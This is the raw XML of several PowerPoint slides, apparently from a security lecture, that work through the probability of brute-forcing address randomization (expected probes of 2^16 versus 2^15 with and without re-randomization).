            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1668527245"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="2000" advTm="58518"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="slow" advTm="58518"/>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bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="762000"/>
            <a:ext cx="8839200" cy="5867400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="90488" tIns="44450" rIns="90488" bIns="44450" numCol="1" anchor="ctr" anchorCtr="1" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="88000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" kern="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Expected number of probes: 1/p =</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" kern="0" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="88000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3600" b="0" kern="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="88000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>E[X] = 1/p for geometric distribution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="88000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3600" kern="0" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="88000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" kern="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>p=</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" kern="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="88000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct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mj-lt"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="latex-image-1.pdf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7696200" y="2362200"/>
            <a:ext cx="381000" cy="279400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895600" y="228600"/>
            <a:ext cx="4160113" cy="579839"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="88000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>With</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t> Replacement:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="latex-image-1.pdf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1403350" y="4114800"/>
            <a:ext cx="393700" cy="584200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="138300670"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="2000" advTm="18128"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="slow" advTm="1812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a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>unning </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> Twice</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Run 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Run 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="780256" y="1981200"/>
            <a:ext cx="7583488" cy="1289050"/>
            <a:chOff x="955675" y="1966913"/>
            <a:chExt cx="7583488" cy="1289050"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="19458" name="Picture 11" descr="Screen shot 2010-02-28 at 4.26.59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966913"/>
              <a:ext cx="7583488" cy="1289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13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="966788" y="2146300"/>
              <a:ext cx="1779587" cy="1089025"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF00">
                <a:alpha val="30000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="25400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="780257" y="4343400"/>
            <a:ext cx="7583487" cy="1292225"/>
            <a:chOff x="944563" y="4341813"/>
            <a:chExt cx="7583487" cy="1292225"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="19459" name="Picture 12" descr="Screen shot 2010-02-28 at 4.27.11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4563" y="4341813"/>
              <a:ext cx="7583487"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Rectangle 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="955675" y="4532313"/>
              <a:ext cx="1779588" cy="1090612"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF00">
                <a:alpha val="30000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="25400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>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solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5557341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sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="2915771"/>
            <a:ext cx="4038600" cy="523220"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>With Re-Randomization</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4668838" y="2915771"/>
            <a:ext cx="4475162" cy="523220"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Without Re-Randomization</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="2553494" y="3161506"/>
            <a:ext cx="3886200" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550618" y="1828800"/>
            <a:ext cx="3546964" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>Expected success in 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>probes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5255967" y="1828800"/>
            <a:ext cx="3300904" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>Expected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>success</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t> in 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>15</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>probes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="5715000"/>
            <a:ext cx="7620000" cy="461665"/>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b="1" dirty="0" smtClean="0"/>
              <a:t>Re-Randomization gives (only)1 bit of extra security!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="495300" y="3810000"/>
            <a:ext cx="3657600" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t> bits of randomness: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="30000" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="-65" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5077619" y="3810000"/>
            <a:ext cx="3657600" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solid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b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t> bits of randomness: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>n-1</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="30000" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="-65" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2349425576"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="2000" advTm="91710"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="slow" advTm="9171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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="iStock_000016333205Mediu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0785" y="2000098"/>
            <a:ext cx="3086829" cy="4495800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rounded Rectangular Callout 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="2000098"/>
            <a:ext cx="2514600" cy="2190902"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 154755"/>
              <a:gd name="adj2" fmla="val 6291"/>
              <a:gd name="adj3" fmla="val 16667"/>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That’s true, but is brute force the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> attack?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3020190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smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="179729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Memory</a:t>
            </a:r>
